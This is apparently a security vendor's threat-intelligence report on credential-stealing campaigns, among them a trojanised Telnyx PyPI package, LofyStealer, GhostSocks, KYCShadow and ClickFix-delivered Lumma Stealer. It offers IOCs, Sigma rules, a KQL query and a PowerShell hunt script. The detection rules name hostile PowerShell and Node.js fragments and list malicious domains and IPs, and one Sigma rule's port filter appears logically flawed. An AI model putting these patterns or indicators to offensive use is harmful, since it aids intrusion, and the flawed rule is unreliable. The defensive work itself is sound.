OTX Pulse Analysis: TeamPCP Supply Chain Attack, LofyStealer, & Lumma Campaigns

Threat Summary

Recent OTX pulses indicate a convergence of sophisticated credential theft campaigns utilizing diverse initial access vectors ranging from software supply chain compromises to social engineering.

The most critical finding involves TeamPCP weaponizing the Telnyx Python SDK on PyPI, utilizing steganography to hide payloads in WAV files—a supply chain attack affecting 750,000 monthly downloads. Simultaneously, LofyStealer (LofyGang) targets the gaming sector (Minecraft) using a Node.js loader, while GhostSocks malware turns compromised devices into residential proxy nodes for credential theft.

Additionally, a ClickFix-style phishing campaign deploys Lumma Stealer via obfuscated PowerShell, and the KYCShadow Android trojan specifically targets Indian finance sectors through fake KYC workflows. The collective objective across these campaigns is the mass harvesting of credentials, cookies, and banking tokens for resale on the dark web.

Threat Actor / Malware Profile

TeamPCP (Python Supply Chain)

Distribution: Malicious telnyx package on PyPI.
Payload Behavior: Three-stage architecture. Stage 1 (Trojanized SDK) triggers platform-specific loader. Stage 2 downloads payload hidden via steganography inside a WAV file. Stage 3 deploys a credential harvester.
C2 Communication: Encrypted C2 channels; specific IOCs include scan.aquasecurtiy.org.
Persistence: Unknown specific mechanism in text, likely via Python environment or scheduled tasks.
Anti-Analysis: Uses steganography to bypass network inspection.

LofyGang (LofyStealer)

Distribution: Social engineering targeting Minecraft players.
Payload Behavior: 53.5MB Node.js loader (disguised as legitimate libs) drops 1.4MB C++ payload. Executes directly in memory (fileless).
Target: Steals cookies, passwords, tokens, credit cards from 8 browsers.
Persistence: Unknown specific mechanism in text, likely registry run keys or startup folder.

GhostSocks (Proxy/Stealer)

Distribution: MaaS (Malware-as-a-Service) on Russian forums.
Payload Behavior: GoLang binary implementing SOCKS5 proxy. Partners with Lumma Stealer.
C2 Communication: TLS encrypted to blend in with normal traffic.

KYCShadow (Android)

Distribution: WhatsApp spam targeting India/British Indian Ocean Territory.
Payload Behavior: Multi-stage dropper masquerading as Bank KYC app. Uses WebView phishing.
C2 Communication: Firebase-based remote execution.
Capabilities: SMS interception, OTP theft, VPN manipulation.

ClickFix / Lumma Stealer

Distribution: Fake browser error pages (ClickFix) tricking users into running PowerShell.
Payload Behavior: Downloads malicious MSI, uses HijackLoader and DLL sideloading.

IOC Analysis

Indicator Types:

File Hashes: SHA256, MD5, SHA1 for Python packages, Node.js loaders, Go binaries, and Android APKs.
Network: Domains (e.g., retreaw.click, serv.biz), URLs (hosting MSI payloads), IP addresses (e.g., 85.11.161.198), Hostnames.

Operationalization: SOC teams should immediately load the hashes into EDR solutions for quarantine. Domains and IPs should be blocked at the perimeter (Firewall/DNS). The PowerShell scripts provide a mechanism to hunt for the persistence of these specific artifacts on endpoints.

Detection Engineering

Sigma Rules

YAML

title: Potential TeamPCP PyPI Supply Chain Attack
id: 8a4f3b1c-9d2e-4f5a-8b1c-3d4e5f6a7b8c
description: Detects Python processes downloading potentially malicious files, specifically WAV or audio files, which may contain steganographic payloads as seen in the TeamPCP Telnyx SDK attack.
status: experimental
date: 2026/05/04
author: Security Arsenal
references:
    - https://hexastrike.com/resources/blog/threat-intelligence/ringing-in-chaos-how-teampcp-weaponized-the-telnyx-python-sdk
tags:
    - attack.initial_access
    - attack.t1195.002
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        InitiatorProcessName|endswith: '\python.exe'
        DestinationHostname|contains:
            - 'github.com'
            - 'pypi.org'
            - 'raw.githubusercontent.com'
    filter_legit:
        DestinationPort: 443
    condition: selection and not filter_legit
falsepositives:
    - Legitimate Python package management
level: high
---
title: Suspicious PowerShell ClickFix Activity
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects PowerShell commands executing obfuscated scripts or downloading MSI payloads from non-standard ports, indicative of ClickFix campaigns distributing Lumma Stealer.
status: experimental
date: 2026/05/04
author: Security Arsenal
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_pwsh:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'DownloadString'
            - 'IEX'
            - 'FromBase64String'
    selection_network:
        CommandLine|contains: '.msi'
    condition: all of selection_*
falsepositives:
    - System administration scripts
level: critical
---
title: LofyStealer Node.js Loader Execution
id: 2c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
description: Detects the execution of Node.js processes with arguments suggestive of loading in-memory payloads or spawning suspicious child processes, associated with LofyStealer.
status: experimental
date: 2026/05/04
author: Security Arsenal
tags:
    - attack.defense_evasion
    - attack.t1055.012
logsource:
    category: process_creation
    product: windows
detection:
    selection_node:
        Image|endswith: '\node.exe'
    selection_suspicious:
        CommandLine|contains:
            - 'eval'
            - 'Buffer'
            - 'child_process'
    condition: all of selection_*
falsepositives:
    - Legitimate Node.js development
level: medium

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender

// Hunt for TeamPCP and ClickFix IOCs and behaviors
let IOCs = dynamic(["85.11.161.198", "retreaw.click", "serv.biz", "api.biz", "scan.aquasecurtiy.org"]);
let MaliciousHashes = dynamic(["6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a", "d21a5d08b4614005c8fcd9d0068f0190", "ddd2994acd25bde5ac32a03f1cf30b41"]);
// Network Connections to C2
DeviceNetworkEvents
| where RemoteUrl in~ IOCs or RemoteIP in~ IOCs
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| union (
    DeviceProcessEvents
    | where SHA256 in~ MaliciousHashes or MD5 in~ MaliciousHashes
    | project Timestamp, DeviceName, FileName, SHA256,FolderPath
)
| union (
    // Hunt for PowerShell downloading MSI (ClickFix)
    DeviceProcessEvents
    | where Timestamp > ago(7d)
    | where InitiatingProcessFileName =~ "powershell.exe"
    | where ProcessCommandLine has ".msi" and (ProcessCommandLine has "Invoke-WebRequest" or ProcessCommandLine has "DownloadString")
    | project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine
)

PowerShell Hunt Script

PowerShell

<#
.SYNOPSIS
    IOC Hunt for TeamPCP, LofyStealer, and KYCShadow related artifacts.
.DESCRIPTION
    Scans for specific file hashes, suspicious process names, and registry keys associated with the OTX pulses.
#>

$MaliciousHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
    "d21a5d08b4614005c8fcd9d0068f0190",
    "ddd2994acd25bde5ac32a03f1cf30b41"
)

$SuspiciousProcesses = @("chromelevator", "GrabBot", "node.exe")

Write-Host "[+] Scanning for malicious file hashes..."
foreach ($hash in $MaliciousHashes) {
    Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { $_.Length -gt 0 } | 
    ForEach-Object {
        $fileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($fileHash -eq $hash) {
            Write-Host "[!] MATCH FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking for suspicious running processes..."
Get-Process | Where-Object { $SuspiciousProcesses -contains $_.ProcessName } | 
Select-Object ProcessName, Id, Path | Format-Table

Write-Host "[+] Checking for recent Python/Node executions..."
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} -MaxEvents 1000 -ErrorAction SilentlyContinue |
Where-Object { $_.Message -match 'python.exe' -or $_.Message -match 'node.exe' } |
Select-Object TimeCreated, Message | Format-List

Response Priorities

Immediate:
- Block all listed IOCs (IPs, Domains, URLs) on perimeter firewalls and proxies.
- Quarantine endpoints matching the provided file hashes.
- Audit Python environments (pip list) for the telnyx package versions associated with TeamPCP.
24 Hours:
- Initiate credential resets for accounts accessed from endpoints flagged by EDR during the infection window.
- Investigate network logs for connections to retreaw.click, serv.biz, or 85.11.161.198.
- Review mobile device management (MDM) logs for installation of "KYC" related apps.
1 Week:
- Implement strict allow-listing for PyPI packages in CI/CD pipelines to prevent supply chain poisoning.
- Harden PowerShell execution policies (e.g., enforce Script Block Logging).
- Conduct user awareness training focused on "ClickFix" social engineering tactics and fake browser error pages.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub